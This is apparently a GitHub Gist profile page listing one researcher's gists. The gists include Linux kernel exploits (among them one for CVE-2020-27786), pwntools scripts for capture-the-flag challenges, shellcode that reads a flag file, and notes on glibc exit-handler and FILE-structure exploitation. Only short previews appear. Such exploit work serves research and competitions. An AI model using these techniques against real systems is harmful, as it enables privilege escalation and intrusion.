Skip to content

Instantly share code, notes, and snippets.

View soez's full-sized avatar

soez soez

21 followers · 4 following
View GitHub Profile
@soez
soez / exp.c
Created September 30, 2023 14:24
Bluefrost challenge - EKOPARTY_2022
/*
*
* Author: @javierprtd
* Date : 28-09-2023
* Kernel: 6.2.0
*
*/
#define _GNU_SOURCE
#include <stdio.h>
@soez
soez / exp.c
Created July 2, 2023 21:23
No CVE for this https://lkml.org/lkml/2019/12/5/814 it has never been in the official kernel
/*
*
* Author: @javierprtd
* Date : 22-06-2023
* Kernel: 5.10.77
* Bug : https://lkml.org/lkml/2019/12/5/814
* Review: This bug has never been in the official kernel
* Post : https://soez.github.io/posts/no-cve-for-this.-It-has-never-been-in-the-official-kernel
*
*/
@soez
soez / exploit-CVE-2020-27786.c
Created May 24, 2023 23:33
CVE-2020-27786 exploit
/*
*
* Author: @javierprtd
* Date : 21-05-2023
* Kernel: 4.9.220
*
*/
#include <stdio.h>
#include <stdlib.h>
@soez
soez / robots.py
Created October 1, 2022 21:06
Black Hat MEA CTF
from pwn import *
local = False
binary = ELF("./main", checksec = False)
libc = ELF("./libc-2.27.so", checksec = False)
def menu(n):
io.recvuntil("> ")
io.sendline(str(n))
@soez
soez / aarch64_virt_install.sh
Created September 24, 2022 06:56 — forked from yen3/aarch64_virt_install.sh
aarch64 virt-install commands
#!/bin/bash
rm -rf /home/yen3/ubuntu.qcow2
qemu-img create -f qcow2 /home/yen3/ubuntu.qcow2 10G
virsh undefine ubuntu1604arm64 --nvram
install_from_localtion() {
virt-install -n ubuntu1604arm64 --memory 1024 --arch aarch64 --vcpus 1 \
--disk /home/yen3/ubuntu.qcow2,device=disk,bus=virtio \
@soez
soez / mips64el-debian-qemu-exact-steps.md
Created September 24, 2022 06:48 — forked from bradfa/mips64el-debian-qemu-exact-steps.md
mips64el Debian QEMU install

Installing Debian Stretch mips64el Using QEMU

We're going to emulate the mips64el "malta" machine and install Debian Stretch using QEMU on a amd64 Debian Buster host.

Likely you need your user to be in the "libvirt" group and have installed these packages (or a subset of such):

sudo apt install qemu-system-mips virt-manager libguestfs-tools
@soez
soez / Tip
Last active September 13, 2022 18:35
# Glibc 2.35 Ubuntu 22.04
When exit is called, it passes by here... (Explaining without ASLR)
0x7ffff7daa390 <__run_exit_handlers>: endbr64
0x7ffff7daa394 <__run_exit_handlers+4>: push r15
0x7ffff7daa396 <__run_exit_handlers+6>: push r14
0x7ffff7daa398 <__run_exit_handlers+8>: push r13
0x7ffff7daa39a <__run_exit_handlers+10>: push r12
0x7ffff7daa39c <__run_exit_handlers+12>: mov r12,rsi
0x7ffff7daa39f <__run_exit_handlers+15>: push rbp
@soez
soez / cache.py
Last active February 14, 2022 09:25
Defcamp-CTF-2022_cache
from pwn import *
local = False
libc = ELF("./libc.so.6", checksec = False)
binary = ELF("./vuln", checksec = False)
def menu(n):
io.recvuntil("\nChoice: ")
io.sendline(str(n))
@soez
soez / babyrop.py
Last active February 6, 2022 22:56
babyrop_DiceCTF-2022
from pwn import *
import binascii
# open-read-write file
filename = "flag.txt"
body = "\x5f" # pop rdi
body += "\x80\x77" + chr(len(filename)) + "\x41" # xor byte [rdi + 11], 0x41 ; 11 = len(/etc/passwd)
body += "\x48\x31\xf6" # xor rsi, rsi
body += "\x48\x31\xc0" # xor rax, rax
@soez
soez / pwn2win_2020_ctf_command.py
Created May 31, 2020 16:56
# -*- coding:utf-8 -*-
from pwn import *
# based on https://dhavalkapil.com/blogs/FILE-Structure-Exploitation/
def pack_file(_flags = 0,
_IO_read_ptr = 0,
_IO_read_end = 0,
_IO_read_base = 0,
_IO_write_base = 0,